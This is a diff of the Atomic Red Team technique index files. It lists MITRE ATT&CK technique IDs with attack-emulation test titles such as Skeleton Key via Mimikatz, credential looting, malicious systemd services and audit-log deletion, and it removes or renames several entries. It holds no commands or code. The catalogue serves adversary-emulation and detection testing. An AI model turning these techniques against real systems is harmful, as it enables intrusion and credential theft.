- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.011 Event Triggered Execution: Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.010 Boot or Logon Autostart Execution: Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -348,13 +348,13 @@
- T1137.004 Office Application Startup: Outlook Home Page [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.018 Event Triggered Execution: Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1197 BITS Jobs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1668 Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -375,7 +375,7 @@
# command-and-control
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132.001 Data Encoding: Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.002 Dynamic Resolution: Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.004 Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.005 Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -519,7 +519,7 @@
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555.004 Credentials from Password Stores: Windows Credential Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1003.003 OS Credential Dumping: NTDS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
atomics/Indexes/Indexes-Markdown/esxi-index.md
+1 -1
View File
@@ -31,7 +31,7 @@
# command-and-control
- T1132.001 Data Encoding: Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.002 Dynamic Resolution: Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.004 Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
atomics/Indexes/Indexes-Markdown/google-workspace-index.md
+1 -1
View File
@@ -80,7 +80,7 @@
- T1137 Office Application Startup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.003 Account Manipulation: Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.006 Office Application Startup: Add-ins [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.005 Office Application Startup: Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.001 Office Application Startup: Office Template Macros. [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
atomics/Indexes/Indexes-Markdown/iaas-index.md
+7 -7
View File
@@ -135,7 +135,7 @@
- T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -230,7 +230,7 @@
- T1546.015 Event Triggered Execution: Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.018 Event Triggered Execution: Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -302,7 +302,7 @@
- T1556.002 Modify Authentication Process: Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505.005 Server Software Component: Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1176 Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.005 Office Application Startup: Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.011 Event Triggered Execution: Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.010 Boot or Logon Autostart Execution: Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -351,13 +351,13 @@
- T1137.004 Office Application Startup: Outlook Home Page [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.018 Event Triggered Execution: Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1197 BITS Jobs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1668 Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -377,7 +377,7 @@
# command-and-control
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132.001 Data Encoding: Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.002 Dynamic Resolution: Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.004 Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.005 Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -522,7 +522,7 @@
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555.004 Credentials from Password Stores: Windows Credential Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1003.003 OS Credential Dumping: NTDS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
atomics/Indexes/Indexes-Markdown/index.md
+16 -65
View File
@@ -54,7 +54,6 @@
- [T1027.013 Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md)
- Atomic Test #1: Decode Eicar File and Write to File [windows, macos, linux]
- Atomic Test #2: Decrypt Eicar File and Write to File [windows, macos, linux]
- Atomic Test #3: Password-Protected ZIP Payload Extraction and Execution [linux, macos]
- [T1014 Rootkit](../../T1014/T1014.md)
- Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
@@ -699,7 +698,6 @@
- Atomic Test #8: Obfuscated Command Line using special Unicode characters [windows]
- Atomic Test #9: Snake Malware Encrypted crmlog file [windows]
- Atomic Test #10: Execution from Compressed JScript File [windows]
- Atomic Test #11: Obfuscated PowerShell Command via Character Array [windows]
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.006 Run Virtual Instance](../../T1564.006/T1564.006.md)
@@ -772,7 +770,6 @@
- Atomic Test #8: AWS CloudWatch Log Stream Deletes [iaas:aws]
- Atomic Test #9: Office 365 - Set Audit Bypass For a Mailbox [office-365]
- Atomic Test #10: GCP - Delete Activity Event Log [iaas:gcp]
- Atomic Test #11: AWS - Config Logs Disabled [iaas:aws]
- [T1564.003 Hide Artifacts: Hidden Window](../../T1564.003/T1564.003.md)
- Atomic Test #1: Hidden Window [windows]
- Atomic Test #2: Headless Browser Accessing Mockbin [windows]
@@ -785,8 +782,7 @@
- T1601.001 Patch System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.001 Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md)
- Atomic Test #1: Skeleton Key via Mimikatz [windows]
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.006 HTML Smuggling](../../T1027.006/T1027.006.md)
- Atomic Test #1: HTML Smuggling Remote Payload [windows]
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1230,12 +1226,7 @@
- Atomic Test #2: Add launch script to launch daemon [macos]
- Atomic Test #3: Add launch script to launch agent [macos]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.018 Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)
- Atomic Test #1: Python Startup Hook - atomic_hook.pth (Windows) [windows]
- Atomic Test #2: Python Startup Hook - usercustomize.py (Windows) [windows]
- Atomic Test #3: Python Startup Hook - atomic_hook.pth (Linux) [linux]
- Atomic Test #4: Python Startup Hook - atomic_hook.pth (macOS) [macos]
- Atomic Test #5: Python Startup Hook - usercustomize.py (Linux / MacOS) [linux, macos]
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.010 Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md)
- Atomic Test #1: Install AppInit Shim [windows]
@@ -1376,15 +1367,7 @@
- Atomic Test #5: Run Shellcode via Syscall in Go [windows]
- [T1059.010 Command and Scripting Interpreter: AutoHotKey & AutoIT](../../T1059.010/T1059.010.md)
- Atomic Test #1: AutoHotKey script execution [windows]
- [T1569.003 System Services: Systemctl](../../T1569.003/T1569.003.md)
- Atomic Test #1: Create and Enable a Malicious systemd Service Unit [linux]
- Atomic Test #2: Create systemd Service Unit from /tmp (Unusual Location) [linux]
- Atomic Test #3: Create systemd Service Unit from /dev/shm (Unusual Location) [linux]
- Atomic Test #4: Modify Existing systemd Service to Execute Malicious Command [linux]
- Atomic Test #5: Execute Command via Transient systemd Service (systemd-run) [linux]
- Atomic Test #6: Enumerate All systemd Services Using systemctl [linux]
- Atomic Test #7: Enable systemd Service for Persistence with Auto-Restart [linux]
- Atomic Test #8: Masquerade Malicious Service as Legitimate System Service [linux]
- T1569.003 Systemctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.009 Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1610 Deploy a container](../../T1610/T1610.md)
- Atomic Test #1: Deploy Docker container [containers]
@@ -1590,15 +1573,11 @@
- Atomic Test #2: Modify Terminal Services DLL Path [windows]
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Firefox [linux, windows, macos]
- Atomic Test #3: Edge Chromium Addon - VPN [windows, macos]
- Atomic Test #4: Google Chrome Load Unpacked Extension With Command Line [windows]
- [T1137.005 Office Application Startup: Outlook Rules](../../T1137.005/T1137.005.md)
- Atomic Test #1: Outlook Rule - Subject Trigger with DeletePermanently Action via COM Object [windows]
- Atomic Test #2: Outlook Rule - Sender Address Trigger with DeletePermanently Action via COM Object [windows]
- Atomic Test #3: Outlook Rule - Auto-Forward Emails to External Address via COM Object [windows]
- Atomic Test #4: Outlook Rules - Enumerate Existing Rules via PowerShell COM Object [windows]
- Atomic Test #5: Outlook Rule - Create Rule with Obfuscated Blank Name (MAPI Evasion) [windows]
- Atomic Test #2: Chrome/Chromium (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
- Atomic Test #5: Google Chrome Load Unpacked Extension With Command Line [windows]
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.011 Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md)
- Atomic Test #1: Application Shim Installation [windows]
@@ -1895,12 +1874,7 @@
- Atomic Test #3: Add launch script to launch agent [macos]
- T1671 Cloud Application Integration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.018 Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)
- Atomic Test #1: Python Startup Hook - atomic_hook.pth (Windows) [windows]
- Atomic Test #2: Python Startup Hook - usercustomize.py (Windows) [windows]
- Atomic Test #3: Python Startup Hook - atomic_hook.pth (Linux) [linux]
- Atomic Test #4: Python Startup Hook - atomic_hook.pth (macOS) [macos]
- Atomic Test #5: Python Startup Hook - usercustomize.py (Linux / MacOS) [linux, macos]
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1197 BITS Jobs](../../T1197/T1197.md)
- Atomic Test #1: Bitsadmin Download (cmd) [windows]
@@ -1917,8 +1891,7 @@
- Atomic Test #2: Event Monitor Daemon Persistence [macos]
- Atomic Test #3: Launch Agent - Root Directory [macos]
- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.001 Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md)
- Atomic Test #1: Skeleton Key via Mimikatz [windows]
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
@@ -1986,8 +1959,7 @@
- Atomic Test #1: Base64 Encoded data. [macos, linux]
- Atomic Test #2: Base64 Encoded data (freebsd) [linux]
- Atomic Test #3: XOR Encoded data. [windows]
- [T1568.002 Dynamic Resolution: Domain Generation Algorithms](../../T1568.002/T1568.002.md)
- Atomic Test #1: DGA Simulation (Python) [linux]
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1071.004 Application Layer Protocol: DNS](../../T1071.004/T1071.004.md)
- Atomic Test #1: DNS Large Query Volume [windows]
- Atomic Test #2: DNS Regular Beaconing [windows]
@@ -2014,9 +1986,7 @@
- Atomic Test #13: Splashtop Execution [windows]
- Atomic Test #14: Splashtop Streamer Execution [windows]
- Atomic Test #15: Microsoft App Quick Assist Execution [windows]
- [T1659 Content Injection](../../T1659/T1659.md)
- Atomic Test #1: MITM Proxy Injection [macos, linux]
- Atomic Test #2: MITM Proxy Injection (Windows) [windows]
- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1572 Protocol Tunneling](../../T1572/T1572.md)
- Atomic Test #1: DNS over HTTPS Large Query Volume [windows]
@@ -2143,7 +2113,6 @@
- Atomic Test #7: Windows Screencapture [windows]
- Atomic Test #8: Windows Screen Capture (CopyFromScreen) [windows]
- Atomic Test #9: Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted [windows]
- Atomic Test #10: RDP Bitmap Cache Extraction via bmc-tools [windows]
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #1: Input Capture [windows]
@@ -2527,8 +2496,7 @@
- [T1555.004 Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md)
- Atomic Test #1: Access Saved Credentials via VaultCmd [windows]
- Atomic Test #2: WinPwn - Loot local Credentials - Invoke-WCMDump [windows]
- [T1556.001 Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md)
- Atomic Test #1: Skeleton Key via Mimikatz [windows]
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.003 OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md)
@@ -2541,8 +2509,6 @@
- Atomic Test #7: Create Volume Shadow Copy with Powershell [windows]
- Atomic Test #8: Create Symlink to Volume Shadow Copy [windows]
- Atomic Test #9: Create Volume Shadow Copy with diskshadow [windows]
- Atomic Test #10: Copy NTDS in low level NTFS acquisition via MFT parsing [windows]
- Atomic Test #11: Copy NTDS in low level NTFS acquisition via fsutil [windows]
- [T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md)
- Atomic Test #1: Request for service tickets [windows]
- Atomic Test #2: Rubeus kerberoast [windows]
@@ -2591,10 +2557,6 @@
- Atomic Test #5: MSFT Get-GPO Cmdlet [windows]
- [T1652 Device Driver Discovery](../../T1652/T1652.md)
- Atomic Test #1: Device Driver Discovery [windows]
- Atomic Test #2: Device Driver Discovery (Linux) [linux]
- Atomic Test #3: Enumerate Kernel Driver Files (Linux) [linux]
- Atomic Test #4: List loaded kernel extensions (macOS) [macos]
- Atomic Test #5: Find Kernel Extensions (macOS) [macos]
- [T1087.002 Account Discovery: Domain Account](../../T1087.002/T1087.002.md)
- Atomic Test #1: Enumerate all accounts (Domain) [windows]
- Atomic Test #2: Enumerate all accounts via PowerShell (Domain) [windows]
@@ -2662,10 +2624,6 @@
- Atomic Test #2: System Service Discovery - net.exe [windows]
- Atomic Test #3: System Service Discovery - systemctl/service [linux]
- Atomic Test #4: Get-Service Execution [windows]
- Atomic Test #5: System Service Discovery - macOS launchctl [macos]
- Atomic Test #6: System Service Discovery - Windows Scheduled Tasks (schtasks) [windows]
- Atomic Test #7: System Service Discovery - Services Registry Enumeration [windows]
- Atomic Test #8: System Service Discovery - Linux init scripts [linux]
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux]
- Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [linux]
@@ -2799,11 +2757,8 @@
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
- Atomic Test #1: System Network Connections Discovery [windows]
- Atomic Test #2: System Network Connections Discovery with PowerShell [windows]
- Atomic Test #3: System Network Connections Discovery via PowerShell (Process Mapping) [windows]
- Atomic Test #4: System Network Connections Discovery via ss or lsof (Linux/MacOS) [linux, macos]
- Atomic Test #5: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
- Atomic Test #6: System Network Connections Discovery via sockstat (Linux, FreeBSD) [linux]
- Atomic Test #7: System Discovery using SharpView [windows]
- Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
- Atomic Test #4: System Discovery using SharpView [windows]
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1619 Cloud Storage Object Discovery](../../T1619/T1619.md)
- Atomic Test #1: AWS S3 Enumeration [iaas:aws]
@@ -3094,7 +3049,6 @@
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1496 Resource Hijacking](../../T1496/T1496.md)
- Atomic Test #1: FreeBSD/macOS/Linux - Simulate CPU Load with Yes [linux, macos]
- Atomic Test #2: Windows - Simulate CPU Load with PowerShell [windows]
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1485 Data Destruction](../../T1485/T1485.md)
- Atomic Test #1: Windows - Overwrite file with SysInternals SDelete [windows]
@@ -3117,7 +3071,6 @@
- Atomic Test #10: Windows - vssadmin Resize Shadowstorage Volume [windows]
- Atomic Test #11: Modify VSS Service Permissions [windows]
- Atomic Test #12: Disable Time Machine [macos]
- Atomic Test #13: Windows - Delete Volume Shadow Copies via Diskshadow [windows]
- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #1: Shutdown System - Windows [windows]
@@ -3152,9 +3105,7 @@
- [T1195 Supply Chain Compromise](../../T1195/T1195.md)
- Atomic Test #1: Octopus Scanner Malware Open Source Supply Chain [windows]
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1659 Content Injection](../../T1659/T1659.md)
- Atomic Test #1: MITM Proxy Injection [macos, linux]
- Atomic Test #2: MITM Proxy Injection (Windows) [windows]
- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
